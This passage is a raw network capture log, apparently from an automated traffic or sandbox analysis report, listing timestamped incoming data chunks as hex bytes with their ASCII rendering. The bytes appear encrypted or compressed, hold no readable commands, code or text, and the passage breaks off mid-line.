2023-10-13 13:21:13 UTC	2616	IN	Data Raw: 52 eb 29 e9 af 00 49 34 e4 bd 00 81 8e ef fa 47 0a e4 e3 3f 57 38 b8 9a 23 6b fa b2 26 61 41 9f 3f 33 e3 d9 b5 c3 83 5d 31 07 1e 96 c3 37 fa b6 57 76 27 28 81 05 a7 34 2f e2 1d 0e 2e a5 3d f9 b2 c9 cf f6 16 d8 39 16 85 32 bc c0 20 2a 39 32 c2 d6 76 ef 4f b1 52 0d 34 64 37 a0 99 13 cc ab 56 6d e9 19 c8 28 63 a0 d9 d4 d4 2e 5c b6 da 68 b5 e1 d9 26 dd df 08 90 54 69 60 92 a6 66 98 3d 33 3d f3 b3 2a 30 41 2e 7d 66 3a 4a ab 96 1c 43 23 cf 42 49 3c dd 42 94 c9 ce b2 09 62 80 0f 63 06 74 1d f7 d4 04 82 c7 3f 22 91 90 8f 50 41 52 de e5 3c 6c 90 57 52 7e a7 36 39 3c d1 5d d1 e7 9e 79 03 b8 c6 9d 5e cd 2c aa ce 21 98 42 5a 99 d5 1e 11 a3 ac 69 1a 44 66 84 1e 4b 15 06 25 0b 2f 5c 2a 7e b7 ca a4 4c aa 22 03 5c 44 3f db f9 95 5c 10 53 15 c1 77 1b 7f e8 57 f5 8c 4c 15 Data Ascii: R)I4G?W8#k&aA?3]17Wv'(4/.=92 92vOR4d7Vm(c.\h&Ti`f=3=0A.}f:JC#BI<Bbct?"PAR<lWR~69<]y^,!BZiDfK%/\*~L"\D?\SwWL
2023-10-13 13:21:13 UTC	2632	IN	Data Raw: d6 31 55 91 e7 11 5e 5b 7a 37 9a 44 9f ff f9 0e b9 40 49 11 b7 42 74 e1 e3 2b f2 36 d9 8a c5 93 16 b6 83 ac dc 43 5c 17 17 c1 06 65 82 be 74 74 33 0a 92 60 03 ed c0 9a b9 8e 14 e7 30 10 fd f6 c3 bb bb c6 d3 10 59 04 28 00 50 16 76 f8 24 50 8f 87 db 76 2f c7 07 e3 ee 1b 93 46 02 7f e3 59 98 68 05 a0 20 2f 28 e6 80 54 bb f1 d2 3c 8e 91 23 15 04 3c 6b 69 31 f5 6a 3d 54 d5 e7 be 5e be a9 c8 ca 07 4c b1 bb e5 39 a4 5e 02 26 1e b0 0b cc 61 c2 52 f7 1a d1 b9 0c 3d 49 f3 23 66 cf cc fd bd 1a e6 fb ed 82 8c b2 b8 3b 5c 1a 9f 4a a0 d9 8d 49 ad 88 18 36 5b 71 ad 41 60 e5 04 5f a7 ee 35 e9 bc ca 8a 7d 8e c1 ae 08 58 ce 42 2c a7 54 09 0f e8 8f 20 85 e8 d8 78 a9 d1 79 8d 27 aa 93 b1 f9 74 18 8a e7 32 3d 85 bd 77 54 4a 49 06 9a c7 6c 32 95 30 cf 2b 4d bc 29 0e 09 4b d8 Data Ascii: 1U^[z7D@IBt+6C\ett3`0Y(Pv$Pv/FYh /(T<#<ki1j=T^L9^&aR=I#f;\JI6[qA`_5}XB,T xy't2=wTJIl20+M)K
2023-10-13 13:21:13 UTC	2648	IN	Data Raw: 9d c2 10 7e bf b1 01 9a bd 8a 64 95 22 53 47 de 84 ce ef c4 f3 ea f7 f0 72 cb dc a0 07 c0 4d 22 65 29 dc 8f 22 e9 b7 ea bd a9 93 2a 93 88 3b ea a8 e6 a5 4e fe 69 72 bd 18 4f 91 15 dc 7b 6f e6 a7 77 cd 0f 18 31 b9 8d b0 11 f2 ab 65 21 dd 18 a5 0e 56 1b de 68 56 c4 24 ed a2 3d 2b 53 38 a7 d6 61 42 e1 51 e5 86 6d de 03 cf fd ba 12 df 44 bc 65 89 17 fd 7a 51 33 aa 5e 1a c3 10 c7 3a 8a ed 79 5e 93 a5 d1 27 be 76 a5 18 c9 76 d3 ef cd 83 98 74 ae 8b 77 77 be 9e 07 23 e0 b4 9c f4 7b a8 17 8b 5b 62 87 d8 80 b0 36 89 6d d1 1e 96 85 3c a0 8c b5 3f ee d9 35 45 9e 1f 4f fe 25 bd 3d 26 f8 72 ec 69 43 6d 4f e0 7a c1 0e b9 f9 3c 32 f2 d9 7a 01 a8 0a 4b 3c aa 85 01 e9 bc 05 84 5a 57 30 8b 65 b7 5c 16 cf 15 61 c3 e9 bb 16 09 9e 8f 1a 37 b7 af 5a ce 6b f8 b0 65 ab e7 3d 47 Data Ascii: ~d"SGrM"e)"*;NirO{ow1e!VhV$=+S8aBQmDezQ3^:y^'vvtww#{[b6m<?5EO%=&riCmOz<2zK<ZW0e\a7Zke=G
2023-10-13 13:21:13 UTC	2664	IN	Data Raw: 4c 10 22 ab 20 6a 87 b4 a1 49 cb a4 ed 71 ae d7 3e 67 c6 58 f4 2c 02 aa d4 06 0c ef a0 3a ee ac 65 21 9c 30 f0 ef dc b0 8e 29 b6 bc da 6e 92 7f aa 88 f7 7a b1 bf aa e7 2d 1d 58 df 22 57 0d 10 59 75 8f 27 44 ee 44 a5 3b 7c 4e b2 ce 37 cf a9 e1 7c 54 e0 6e c3 6f 04 9f 7a 3e 81 c0 59 4a d3 18 b9 38 f6 d2 68 60 84 7e 0d cc 54 1e 04 7e d3 af 80 6a e0 35 56 38 b4 ab 04 cb 04 46 3c 36 c9 a4 ca b6 6f b2 88 df 03 e4 10 27 3f 66 94 f9 75 de d2 7a f9 ac c0 b9 e4 ef bb 76 16 ff 6c 5c a0 75 12 aa 5d 8e 18 34 2d 36 79 a2 0c 8f 16 89 25 74 de e6 c6 77 16 04 fc 0c ab 73 fa f2 75 cc 05 cc 2f b4 9a bd e7 ec 58 0f 86 91 91 4c 15 01 e5 cb ff a8 25 72 99 ff 7a da 73 1e 0f fc 70 c3 34 1b 4d e9 b5 c4 7c 7a 1b de b1 6d d0 58 48 52 ab 45 5c 96 f0 52 d3 0f 42 a2 d1 e0 6c fd 75 4f Data Ascii: L" jIq>gX,:e!0)nz-X"WYu'DD;\|N7\|Tnoz>YJ8h`~T~j5V8F<6o'?fuzvl\u]4-6y%twsu/XL%rzsp4M\|zmXHRE\RBluO
2023-10-13 13:21:13 UTC	2680	IN	Data Raw: bd 72 89 ac 1d ed c4 4e fb 26 6b 23 3b 51 22 b0 fb 42 99 fd 70 0b 72 e1 f5 75 1f c0 d6 e4 0a ab 70 8f 7b 3b a3 4f 68 69 cb 40 80 54 26 8e 87 89 b6 84 b4 63 85 dc 43 c8 62 8c 0a 83 e4 60 92 2f 05 df ba ee a2 39 39 60 22 54 82 fb 10 7e 6e 00 62 44 a4 98 a9 c4 c2 d5 5e c7 ed 54 2a 9e 20 a3 4d cb ca 98 a5 4b 43 fa 5f 1e 8f 73 62 37 08 4c 03 8d 28 b8 fc 7c d5 85 47 08 d0 38 01 12 e5 6d de 8f 2c 5c ab 88 b4 e1 d7 0c b4 32 96 c5 42 86 d2 5f fe bf 3d 8d fa c6 48 cc 2b 12 92 90 62 4b a6 43 92 48 95 6d 0e e5 5b cf 75 82 ac 9e 14 a2 0b c2 0c 84 6b 48 24 78 59 44 8a 54 d2 45 dd b7 a0 79 e0 07 1b d7 9b a1 8d 5a 6c 87 88 95 38 e9 1c 6d b3 23 bb 4b b5 17 90 d8 37 99 3d d4 8c 3e 3e 4c df 38 12 8d ab a6 8c 74 c1 91 4b 71 6a 97 d0 d8 a9 d5 7c 64 2f 52 ce 1b 5b 08 1e a1 54 Data Ascii: rN&k#;Q"Bprup{;Ohi@T&cCb`/99`"T~nbD^T* MKC_sb7L(\|G8m,\2B_=H+bKCHm[ukH$xYDTEyZl8m#K7=>>L8tKqj\|d/R[T
2023-10-13 13:21:13 UTC	2696	IN	Data Raw: a4 24 2b 97 f1 c0 db 59 ff d0 e3 a9 a2 a8 2a 4b 31 c8 81 5a b8 a6 35 4e 02 cd 72 3b ba f8 cc 23 df 32 d5 83 fd a5 e2 97 5d 5d 85 0d 9c 30 e6 7c f1 73 c4 5c 15 61 dd a3 64 08 5c b5 06 9c 0b 94 0c 18 99 e4 2e 7a de 52 33 f5 62 a4 98 63 13 aa 49 8b 42 bc 1e 16 90 12 da 6e 16 d9 fc db b5 2c e3 94 94 33 db ea 98 d1 fa 26 b4 13 b5 a5 bf 3b d1 89 bf a2 ca 0a aa 0b da 4e 5b b6 6f ab fa 01 a2 6d 29 3c 2e 0b cb 77 41 83 ae 76 bb 70 2e be cf 69 3a 3d c8 46 33 b6 9b 28 26 48 7f db de 20 a6 cc b9 4e 44 88 5d 9e b1 14 1f ec d8 4c 80 93 e0 7c 22 34 1f 7f 6a 1e ed 2b 1b fc 6b dd 82 de 76 29 6f db 8b c3 51 eb e4 9a 85 c9 b6 73 2d 2f da 62 9e 64 71 f8 65 fd a8 9e 1f 60 96 5a 5c 95 8b ee 84 21 89 91 fa e9 b4 1f fe f6 5e 68 62 8e 5a 5e 02 30 84 04 fd cf 4b 3c c3 4d e9 a2 7b Data Ascii: $+Y*K1Z5Nr;#2]]0\|s\ad\.zR3bcIBn,3&;N[om)<.wAvp.i:=F3(&H ND]L\|"4j+kv)oQs-/bdqe`Z\!^hbZ^0K<M{
2023-10-13 13:21:13 UTC	2712	IN	Data Raw: f2 cf 68 1f 4d 77 38 45 74 95 24 17 4d 2d c8 fb fc 5e 3f 5b 2a 4f ce c7 01 67 50 49 9d 65 fe 63 e0 45 20 3b 1b e4 bb 99 d7 e8 e5 1a 06 74 53 f7 02 44 9e 26 c0 2d 93 e9 16 36 f7 2e 5f 32 ca 52 20 49 88 a7 a1 7b 0f dd b5 e9 18 d9 15 8f f8 ce 43 8e 2f ad d2 b8 f2 72 cd 68 b4 8f 7d 40 b9 c7 e5 d2 5e c0 d4 14 fc e4 48 f4 4c ad 57 38 e1 55 9e 26 69 55 45 ff e5 da 31 24 ac b7 e6 74 57 fa 9e d7 f4 0b 2c c7 3d 58 de a2 01 06 fe e5 c3 cc a1 b7 2c 3e ec 5b ef c3 4e 28 22 0c 0e 5c 05 9b c0 3a ea 3b b6 8b 1c 05 60 d8 45 9a ac 35 62 09 2a 8b ae bb 6f c4 1e 2b f8 81 fc 6c 4d fa 98 85 4e 93 f3 2e 2f 5f 96 59 2a 24 e1 c2 e0 c2 3a 9e da 8f cc 21 f0 4b 60 bd 65 a6 58 11 3c 6d 9c 97 db 00 33 d4 98 03 ad d9 9e 09 2a 66 7e bc 47 26 9c 44 9f 7a 67 c4 f2 46 8f 88 4c c0 ed 99 40 Data Ascii: hMw8Et$M-^?[OgPIecE ;tSD&-6._2R I{C/rh}@^HLW8U&iUE1$tW,=X,>[N("\:;`E5bo+lMN./_Y$:!K`eX<m3f~G&DzgFL@
2023-10-13 13:21:13 UTC	2728	IN	Data Raw: b4 bd 47 a2 5b 77 02 81 25 36 2d b5 05 79 bb 4f af 64 47 4c cd a7 22 df 15 65 d1 ca 3f 07 b0 39 7b 74 33 d5 72 ab 3b 06 b0 e8 85 aa 4f ad 86 a5 f7 68 5c 5e 1a fe 1d 05 fa f3 c0 14 d1 30 f5 67 91 11 be 76 4f 43 cc e3 32 5f 51 14 6f 9b 41 0b 85 b2 e4 89 13 9e 7e 5c 86 67 2b 34 8a b5 69 d7 af 12 6c cc b2 80 3c 48 40 9a 10 47 17 f7 c2 e3 b0 e9 d9 dd 9d c1 17 ac 9b 85 d1 71 1e 07 5d bf 59 d2 5c cd 8e 23 3a 29 d6 5e 30 6e cf 8e 80 eb aa 47 56 bb 72 c1 dd 8f a3 38 06 82 f0 24 a9 63 15 a3 6f 4c 20 52 ae a1 06 7a 38 18 60 2e cf 27 5f 5d fd 11 1b 4f b0 d7 c9 e6 f6 0f e7 a0 75 8a 6d 39 33 95 b5 5f 65 36 75 19 81 95 c3 f6 ef be 88 ef 76 c2 e5 dd cd d4 e9 7b 08 b1 60 8a 35 c0 f1 49 9d e3 40 15 4f bf 3e b6 60 2e 48 71 b0 c7 2c ba 48 bb 67 55 87 f1 30 84 54 7b 45 07 26 Data Ascii: G[w%6-yOdGL"e?9{t3r;Oh\^0gvOC2_QoA~\g+4il<H@Gq]Y\#:)^0nGVr8$coL Rz8`.'_]Oum93_e6uv{`5I@O>`.Hq,HgU0T{E&
2023-10-13 13:21:13 UTC	2744	IN	Data Raw: 21 ba d3 0c 43 da 1a 99 6e 06 c2 6c db c9 6f 77 82 92 02 b0 ea f6 b5 24 49 c8 6e da 0b d0 94 48 51 7e eb d8 72 65 dd 97 a7 a9 eb 07 62 b6 79 93 b0 b7 69 01 79 85 0a 6b 69 db 50 81 a0 83 1f 9a f8 ef b1 fc e3 71 fc 24 1a 98 23 1d 1a 53 af 61 7f 8c 14 72 f3 6e 99 c3 fe 9c 20 8b 47 51 15 34 f5 bd 09 2c e7 4d 66 16 b8 58 89 b9 08 8a 45 f9 49 3c 3c 46 06 d1 86 83 a5 c5 85 13 ba f9 c7 38 03 c0 8a 45 d4 d9 77 e1 5f 7a bc 3c d6 26 36 cd 63 48 e3 78 0b 4d 27 54 32 cf 01 8c 59 b0 fb 9c 04 21 a4 df bb 0d 4d b2 5c bd 09 d3 9c ac a0 ae 93 27 29 08 2d 61 ff 78 f6 03 d8 cd d4 aa f1 8a 74 ed 5f 79 2e 0a 94 06 8f a0 6e cc c2 d8 4a be 5a c2 b9 4c 5c 10 e8 ee af d0 d6 4c 35 95 6f 46 41 aa 43 66 7b 71 26 91 b1 af 9b 3e 66 91 87 fc 7c 09 6f f9 b8 29 96 0c b3 0f fc b9 ef 83 8d Data Ascii: !Cnlow$InHQ~rebyiykiPq$#Sarn GQ4,MfXEI<<F8Ew_z<&6cHxM'T2Y!M\')-axt_y.nJZL\L5oFACf{q&>f\|o)
2023-10-13 13:21:13 UTC	2760	IN	Data Raw: ee 6e e8 f6 5f 2d 03 8a 07 ad e7 b4 da b9 8d c4 14 ff f0 1c 4f 37 38 aa 93 a8 9d ca 05 4b b6 28 9c 86 7b 09 fd 9b 89 a4 bc 6e bb 23 19 9a b1 e3 59 eb 0d 14 80 e8 c5 ff 43 d8 a2 a7 ec 8f 64 ef c9 b0 ef 05 a1 41 72 dc 12 bf a5 13 23 9e fe 40 e3 5f ab 18 e0 36 87 ed 5a cf 0f 14 02 7d 75 55 6b 28 db d9 e9 96 58 a7 14 0c 65 99 a6 72 c1 97 1a 96 b4 87 d3 cb 4c 8f c3 e5 32 cb ce 3e 4c 42 3e ac d8 08 df fb 93 59 37 a4 3a 34 c4 dc 10 3b 01 3c f2 71 d8 37 ee 8f c6 9a d9 e7 13 f6 ab aa 4f 58 af 8b 74 90 98 b9 ae 9c 5e 9b bb 53 cd d0 43 9f e8 06 31 0e f3 cc d3 22 a1 5d 91 fd ef cf 90 59 7e 3b 30 ea b7 7f 72 f3 77 5d 42 f9 ce 9d 67 b0 4c bc ab e7 5f 9a 4d 61 f2 be 8d 0c 29 ce 4d 88 5a ce fd 42 46 1f ec 2c e4 4e ae e4 f5 db 87 50 e9 74 8f 17 79 83 b7 0a f9 ff b4 65 4c Data Ascii: n_-O78K({n#YCdAr#@_6Z}uUk(XerL2>LB>Y7:4;<q7OXt^SC1"]Y~;0rw]BgL_Ma)MZBF,NPtyeL
2023-10-13 13:21:13 UTC	2776	IN	Data Raw: ac 58 22 e5 7e 7d 64 8c 81 3c e2 80 ab 33 7b 28 9c cd d6 02 f0 19 d1 6d 0a 55 60 92 d9 b5 6e 73 fc 52 c8 a2 5e f7 7d f0 01 99 c9 25 e7 27 15 b3 52 3a 83 c2 8e e1 1e df 18 f1 6e 13 6a e4 95 f3 57 b4 ef 0a 13 16 91 26 e3 7d f1 18 dd 37 cf 93 17 59 84 2e 62 60 12 86 da b9 d9 e5 6c f2 6e 62 99 87 ef 34 c9 0c 13 5c 01 03 bc 2d bc e0 ba b0 50 2e 2e 06 66 30 46 bf 28 1d 6d 39 cf a7 31 19 20 7d 3f 96 d3 6e d9 8f 9f a6 80 48 7e df fe dc fd 75 6f 23 8e 66 76 ea a4 63 4c 23 69 49 69 ad 65 da f0 ac 34 7b 7d ef d6 38 ce 12 e2 7b 03 63 69 42 04 b3 81 1e 02 2f 6f 62 29 04 62 93 91 62 48 d1 4d 8e 7a ce f4 95 54 e4 15 2f 22 a8 1f 15 31 56 23 e9 b4 29 e8 45 ab ca f1 72 7c bf ae 28 cd 3a 9f 1a d1 df 5a b3 66 3e 1a 7f 46 ce 5c 09 e0 23 58 fb 87 9d b3 d4 9e 1d c4 b6 c5 b7 97 Data Ascii: X"~}d<3{(mU`nsR^}%'R:njW&}7Y.b`lnb4\-P..f0F(m91 }?nH~uo#fvcL#iIie4{}8{ciB/ob)bbHMzT/"1V#)Er\|(:Zf>F\#X
2023-10-13 13:21:13 UTC	2792	IN	Data Raw: d1 31 e8 dc d2 41 cc 2a 2a b4 0c a3 45 34 70 2d 17 d5 3f 8b b0 31 9c 34 60 a4 53 d2 9c 3d ff 11 2b 0e 23 6e 44 ac 22 b2 fa f8 87 23 3f 17 67 b7 fa 94 15 8c 45 52 80 39 86 fe c0 38 61 0c 9d a5 f1 4e a2 b2 f1 aa 72 c8 d9 02 36 0e 48 9f 7a cb a2 4b f8 15 e3 e2 1e 07 5e c1 4e d8 31 b8 49 9c 5c 2f b3 53 f7 a0 fe d4 ca 6f 9d a5 8f 5c f6 3f eb 97 b0 b6 40 b2 3d 2b c2 8d 1e 4a 77 f7 85 25 1e 14 a3 23 ea 40 07 4d 2f 25 7d 09 ba cf c6 1d 22 b3 53 06 6a e1 2a dd 97 0a 67 47 b4 d2 5c d6 2e f4 03 2d 5f 42 0b e5 df cc ab 76 0f d9 b3 cc 76 9f 81 3e ce b7 de 28 a2 ae 34 1a 13 fc 26 a4 df bb 81 f0 d4 ac 5b 0b 27 4e 6a 3b ea e4 38 1f 05 9e 70 0f 44 49 a8 e4 6d 32 48 8b 2e 73 5f 68 86 65 58 3a 9c 0d 63 7f b0 64 7c e0 78 fd 1c 8f 56 31 90 53 ba 6c 65 41 22 9d ee 80 c9 27 81 Data Ascii: 1A*E4p-?14`S=+#nD"#?gER98aNr6HzK^N1I\/So\?@=+Jw%#@M/%}"SjgG\.-_Bvv>(4&['Nj;8pDIm2H.s_heX:cd\|xV1SleA"'
2023-10-13 13:21:13 UTC	2808	IN	Data Raw: db 48 8a 9e 37 72 cf cf da 65 a4 9a bb 99 63 87 85 90 bc e2 61 7e 96 1d 52 c0 bb 24 97 ab fb 31 3d 7f 1d 59 35 0d 93 f9 c0 1e b5 28 31 2a 5f be cb ab a4 42 d9 c2 8b 9c 1c 2b 24 80 ac 3d 22 ad 91 a9 a0 67 5d 05 bd aa 31 b6 96 81 48 b9 9d 7d ee b8 4c 4f c4 4e fd 83 55 fc 2d ec a2 7a 6e 49 e8 7c 4d bd 9f a3 3e 89 4f e7 a0 70 0e d3 cc e3 67 00 68 c4 a7 b1 32 57 31 8e fe 41 17 01 b0 e7 4a 3f 0a 94 e8 6b 6d 0a aa 87 b0 69 bf 14 99 a1 38 51 93 13 9e 67 49 11 6b 8c 94 1b 85 72 69 ea 8a de f6 b2 6a 74 41 ee c7 8c d8 e6 26 e4 8c b6 57 82 9d 1c 0e 6e 80 84 b8 e5 b7 df 91 a3 57 26 fe 82 7f bd 83 ed 29 c3 f9 41 bc f2 a3 ee a7 3d 6d 20 c9 19 d7 2c 77 f4 44 cd 53 d3 30 fa 16 d2 2a 6a ce 06 4b 0e 8e ab ef b5 11 dc 60 61 54 d7 8d aa 97 ac d6 ee 79 7f 31 76 35 11 ed 41 cb Data Ascii: H7reca~R$1=Y5(1_B+$="g]1H}LONU-znI\|M>Opgh2W1AJ?kmi8QgIkrijtA&WnW&)A=m ,wDS0jK`aTy1v5A
2023-10-13 13:21:13 UTC	2824	IN	Data Raw: ad 8f 4f 04 92 83 19 50 85 cd 57 b9 97 13 cb 22 53 0a 53 ef 9c 1d 18 b3 b8 df 44 78 04 83 69 1f 68 f5 94 ab 44 12 a0 b5 0a c8 b1 4f 58 b2 59 e3 81 d8 3a f7 bb d9 2d d3 ca 41 bf 34 36 c3 60 56 fe 0a 0a 5e b8 31 31 a2 62 e4 28 67 27 cc ae 28 cd 5d c7 f1 91 02 f5 2c 27 a2 b7 b8 32 62 a2 cf 12 3f 76 a7 69 0c e8 ae 5a 9c 01 33 12 dd b6 84 70 9b 77 4c 04 6c 35 50 94 2d 93 fa e5 b5 e2 e1 ee de 72 c9 2d 4f 6f 0a 3c 7f 3d a3 d7 77 52 6f 31 08 f2 7a db af 30 99 3f 15 9f ac 44 33 26 a9 14 77 95 e1 a5 25 86 5e 81 db 31 b9 f3 94 b7 58 f9 e2 db c4 d8 88 66 7d c3 63 53 0a 3a 95 a7 7b b4 0d 36 b1 d9 00 0a a8 db a0 7e 98 f8 94 ab 77 4a 23 67 26 b4 9d c0 15 a0 43 97 f5 67 15 b9 3d 55 be 52 a0 63 88 ff a5 0f 9f 76 d3 75 ca 23 fc 6e a9 bc 42 ae b1 62 90 f1 ce 81 90 a3 db 36 Data Ascii: OPW"SSDxihDOXY:-A46`V^11b(g'(],'2b?viZ3pwLl5P-r-Oo<=wRo1z0?D3&w%^1Xf}cS:{6~wJ#g&Cg=URcvu#nBb6
2023-10-13 13:21:13 UTC	2840	IN	Data Raw: e6 f3 99 d1 6d 64 28 82 cf d4 4f ca c8 6f 0a bf b1 78 fb 19 39 d8 92 28 c1 e5 ad cc bc 14 fe 10 9e 35 9e 2f d9 26 74 9c 2d 2f d9 be 0f 1f b4 d9 6a 90 e7 dc e7 d3 d3 54 55 87 cf 4d 70 46 28 39 5a dd 8f 50 58 5e 4a 40 6a f7 7b c3 ab 68 f3 2b 91 1f c2 15 72 2d 5a a5 7e 37 fc 78 91 ea 88 81 38 ee 05 df 22 0c 19 bc 1a 4f 35 d9 74 ee f0 f9 42 bb 17 0c f1 4f 45 c6 45 9e 2b a5 d6 f3 9f ee e8 35 1a ab aa 52 1a d5 3c 32 86 6d 56 c1 94 fc bb 45 60 9b 21 5c 84 d1 db ae 5f ce 45 2b dd c7 b9 40 54 33 ea 54 4c 54 0e 56 b3 fe 9c 98 c2 a7 76 47 89 6a 65 56 f2 98 08 55 09 8c aa 5b 1e 82 4e 2c 01 51 a7 c4 a4 d4 02 e6 e1 0b d6 98 db 8d e9 fd 6d c1 c8 49 73 72 25 5d 9b 1b 03 92 b4 a9 fe ba 82 b1 87 1f 55 d9 22 df 33 02 45 ab 34 38 9f 50 ff dd e3 ab 66 7d 3c c2 03 0d 3d 3c 62 Data Ascii: md(Oox9(5/&t-/jTUMpF(9ZPX^J@j{h+r-Z~7x8"O5tBOEE+5R<2mVE`!\_E+@T3TLTVvGjeVU[N,QmIsr%]U"3E48Pf}<=<b
2023-10-13 13:21:13 UTC	2856	IN	Data Raw: e5 2e e7 5b 9c 42 fe b7 ee 7e c5 fa e3 b0 6f 3e 2b 2e ca 17 94 4e dc e9 81 ac 89 45 e0 a6 60 49 e2 88 30 de 38 14 53 da f0 f5 f8 4c 86 ba 88 65 36 88 ae 27 c7 35 b9 29 9c 45 12 6f 25 c3 8e 54 16 2d c0 b1 f6 af 1a 9b 52 2b 5e cb 37 4a f2 73 e0 71 1d d6 c5 86 3b 8e be 13 d2 71 a7 71 74 93 9f 5b e7 bf 39 31 f7 df e3 8a 7d 32 49 13 ea 2b 22 5d b8 12 df 06 91 77 e8 07 39 a4 55 fe a8 38 32 8a 5d cb f3 2b 86 0c a1 90 b2 3a e1 a4 9b 7c b8 a5 16 f8 7a 12 9f b1 26 2f db e4 f4 61 59 f3 42 0e f4 90 5b d7 89 9d 1c f3 f4 7d 50 c9 e8 69 88 6d 80 64 58 30 a9 f6 06 77 12 27 5c 6c e8 d0 30 e3 a2 55 71 34 62 4d ae 38 e1 62 97 66 3c 45 e1 05 0f ac e7 dd 9c 07 f6 9a 3f a6 5f ff 40 8b d0 b2 55 bd 54 aa e1 f8 7c 5d ee 2e c0 6e 3c 4c d3 19 14 07 11 47 2c 4e d5 ff 60 d8 26 10 68 Data Ascii: .[B~o>+.NE`I08SLe6'5)Eo%T-R+^7Jsq;qqt[91}2I+"]w9U82]+:\|z&/aYB[}PimdX0w'\l0Uq4bM8bf<E?_@UT\|].n<LG,N`&h
2023-10-13 13:21:13 UTC	2872	IN	Data Raw: 38 4b 40 07 21 fe 8d bd 28 b3 74 5d 25 10 93 5c c0 fd 4f 08 dd 2f 06 47 ed 7c 29 3c 44 d8 c0 6b f3 ee e9 73 07 3d 56 3c b0 15 fc 37 3b 99 97 49 4d b1 4b 70 fb 0f c5 b9 2d ff 86 d4 c2 51 d9 c3 23 6b 56 66 44 79 02 d2 bc 40 1e 93 1d fe dd de e7 ec 1b 1a b9 f8 2c fd 58 db 6b 1b 12 2f 7c f5 6d 2b 23 96 ee 7f 6b 1a c7 dc 07 10 11 dd 4c 67 7a c9 48 ed 52 0a b0 cd be c2 98 3a 90 2f 62 f5 03 01 1e de b3 ca 72 7f 3e 8c 83 a8 07 e8 81 e7 61 fb de 93 27 88 d1 a5 72 47 77 f9 f2 98 74 97 07 13 b6 ac a7 3a 0a 45 4b 70 b4 1b 10 73 2b 38 c8 5b 75 f6 1b b4 79 4e 3d fc 87 e0 ed 62 7c 21 e5 81 47 64 1a 7c 1e 90 15 ee 9d bb 9a 3b 21 0b 99 e4 a9 15 eb ce be 48 99 4f 7a 61 ea 26 b6 15 30 ba a6 3b 39 2a 39 a3 d0 fd a9 0b db 8d 42 fa 3b fe 86 41 80 fb 4f e2 eb 28 aa df 3d 47 0f Data Ascii: 8K@!(t]%\O/G\|)<Dks=V<7;IMKp-Q#kVfDy@,Xk/\|m+#kLgzHR:/br>a'rGwt:EKps+8[uyN=b\|!Gd\|;!HOza&0;9*9B;AO(=G
2023-10-13 13:21:13 UTC	2888	IN	Data Raw: e8 d0 f9 3e dc cb 7e 56 8c a6 e7 31 bc 3b aa 10 88 4c 50 76 bb ee 97 16 10 f5 fd c1 6b a6 68 53 8e d0 86 ea 81 69 89 43 e3 00 fa 32 d6 1a 5f 5b 5d eb 6d 2d 95 b6 70 59 4e 06 2b 14 bd df ea 35 6d a6 2a 26 41 b5 28 f3 23 16 cf 52 51 c6 20 3f 51 23 fe 80 e0 53 6f 6a a7 ea 12 47 d1 e1 65 d8 c7 53 f5 21 f1 82 4a b7 29 dc f7 3c aa 30 b2 9d 1c 08 d5 23 92 98 78 ee fe 92 96 e6 d2 84 73 42 c3 63 c9 a5 c5 18 fa b0 a5 61 e6 75 7b 38 7b 45 96 56 f7 2d 1f 59 fb c9 c0 c8 fd a5 b2 40 c6 fb 09 ff 43 23 d1 a5 df 62 b7 23 2f 94 e6 90 5e a9 e7 4c 9a 9b 25 83 30 1f 97 f9 0f 68 21 46 46 52 5f 5b 51 b1 35 a6 9d 88 4d d7 f8 46 3e a9 10 ee 22 24 22 c4 b5 27 19 b3 ac ff 1f c7 90 ce ae e4 c3 3c 2d e1 f0 91 0b 00 46 00 b0 ef 12 1f d9 17 5d 77 bf c3 3e 4d cd 4e 8c 1e a2 65 02 4e 36 Data Ascii: >~V1;LPvkhSiC2_[]m-pYN+5m*&A(#RQ ?Q#SojGeS!J)<0#xsBcau{8{EV-Y@C#b#/^L%0h!FFR_[Q5MF>"$"'<-F]w>MNeN6
2023-10-13 13:21:13 UTC	2904	IN	Data Raw: db c1 5f d4 69 14 f1 c6 55 42 4d 4d 16 ce f2 e9 f4 74 d0 93 dc dd 65 65 25 3c 24 b7 2c d4 95 92 f0 9a cf f7 53 d9 3d e5 c7 b2 6b 02 ff e7 af 60 99 5c 00 29 46 39 4e 89 65 c4 42 82 17 9b e8 f8 d7 e6 51 f1 8a 68 42 16 8f 97 ee fc c1 b7 10 a3 3b f5 4b 16 37 8a 3d cb 61 6d bf 85 a9 98 a9 1b 81 d9 9a f0 47 72 b5 2a b3 88 c1 53 57 ef e7 4c 16 36 34 4a 12 80 93 b3 f6 3d 50 5a cf b6 87 28 22 97 e6 be 79 29 ba 2c 5f 27 9b f2 c8 14 fa ce 0d b8 27 3a 7d 96 a5 29 56 7b 0a 51 ad 7f ac db 52 74 f3 37 4d 29 83 58 3c 51 bb a5 79 fb 3b eb ce 0f 9b a6 4b 2d d6 f5 0a c7 ef 48 ed d1 2c 25 29 85 48 d9 59 99 f8 d6 96 58 83 e1 ba a2 07 bd ac 54 72 e6 4e 78 97 21 60 96 34 cd 6f 6b ea 26 bb 8d 23 bc 60 30 88 5a 3f 69 f0 ae 61 95 0d 16 36 27 4c 9f c2 cd 4f 97 ca d0 9e e2 d3 e0 cc Data Ascii: _iUBMMtee%<$,S=k`\)F9NeBQhB;K7=amGr*SWL64J=PZ("y),_'':})V{QRt7M)X<Qy;K-H,%)HYXTrNx!`4ok&#`0Z?ia6'LO
2023-10-13 13:21:13 UTC	2920	IN	Data Raw: 26 8e 70 1d 94 a9 c6 0f a3 b0 e8 79 01 ca 9a be 7a 61 5d 24 11 51 55 f4 38 8e 2f e4 03 f3 b8 23 17 2c a4 d0 d2 e4 23 df 2a 25 8f 69 bd df f9 61 13 b4 91 51 f2 d2 14 60 65 bc a0 6f d2 8a e2 51 c0 9f a0 9f 26 1e b5 2f 90 db 69 9a 12 77 e0 a6 bc 3c 20 29 c7 cb b7 73 43 f8 67 b8 b0 a9 94 39 be 2f e4 e2 cb a3 bc 91 f1 a0 32 13 cc 07 66 79 c9 81 54 11 e3 55 11 0e 24 52 f0 5a 5d 65 64 b2 e1 56 ba c6 2f 77 c3 65 6f 79 4c f5 e7 2c 2c e9 c7 fe 0f d3 7e 60 b2 02 44 53 e6 99 04 82 ad ca c3 01 a0 96 40 34 83 89 00 d8 de 49 36 0b ca fa ef ce 5c b9 72 14 2a da 05 ee a9 77 52 f9 46 f4 d3 61 98 36 92 55 be ac 7b 4e e4 cd 25 60 e9 63 ee 61 45 fd 3e 36 26 57 c8 cc 09 50 32 50 e0 47 0b ee 3e 0d 6c 7a 65 4f a4 5c d5 b8 4f 33 a2 